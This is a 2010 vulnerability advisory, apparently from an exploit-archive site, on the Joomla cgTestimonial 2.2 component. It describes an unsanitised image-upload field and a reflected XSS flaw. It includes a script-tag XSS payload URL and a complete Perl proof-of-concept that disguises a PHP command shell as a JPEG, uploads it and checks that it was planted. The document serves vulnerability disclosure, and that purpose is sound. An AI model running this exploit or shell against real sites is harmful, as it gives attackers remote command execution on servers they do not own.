The Joomla cgTestimonial component 2.2 cross site scriptingd shell upload

2010.08.12
Credit: Salvatore Fresta
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities Name cgTestimonial Vendor http://www.cmsgalaxy.com Versions Affected 2.2 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-08-06 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ cg_Testimonial component is a tool for adding testimonial by the user from frontend and managing and publishing testimonials from backend. This Joomla extension allows website user to submit a testimonials form with several fields on one of your site's page and enable adding testimonials by either users or admin. II. DESCRIPTION _______________ Some parameters are not properly sanitised.The following vulnerabilities can be exploited from guest users. III. ANALYSIS _____________ Summary: A) Multiple Arbitrary File Upload B) XSS A) Multiple Arbitrary File Upload _________________________________ The usr_img parameter in cgtestimonial.php (frontend) and in testimonial.php (admin, without checks) is not properly sanitised. A check is executed on the content- type HTTP field. B) XSS ______ The url parameter in video.php is not properly sanitised before being printed on screen. IV. SAMPLE CODE _______________ A) Multiple Arbitrary File Upload http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt B) XSS http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> V. FIX ______ No fix. ################################ PoC-cgTestimonial2.2.pl ################################ #!/usr/bin/perl # # PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component # # Author: Salvatore Fresta aka Drosophila # Email: salvatorefresta@gmail.com # # Date: 06 August 2010 # # http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command # use IO::Socket; $usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n". "http://www.salvatorefresta.net\n\n". "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n"; $#ARGV == 1 || die $usage; my $host = $ARGV[0]; my $path = $ARGV[1]; my $stop = 0; my $rand = "master".int(rand 150); my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>"; my $filename = "evil.php"; my $code = "--AaB03x\r\n". "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n". "Content-Type: image/jpeg\r\n". "\r\n". "$shell\r\n". "--AaB03x--"; my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n". "Host: $host\r\n". "Content-Type: multipart/form-data; boundary=AaB03x\r\n". "Content-Length: " .length($code). "\r\n". "\r\n". $code; my $socket = new IO::Socket::INET( Proto=> "tcp", PeerAddr=> $host, PeerPort=> "80" ) or die "\n[-] Unable to connect to $host\n\n"; print "\n[+] Connected\n"; print $socket $pkg; $pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n". "Host: $host\r\n\r\n"; print $socket $pkg; while ((my $rec = <$socket>) && $stop != 1) { if($rec !=~ /302 Found/) { $stop = 1; } } if($stop != 1) { print "[-] Shell not uploaded\n"; close($socket); exit; } print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n". "[+] Disconnected\n\n"; close($socket);


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top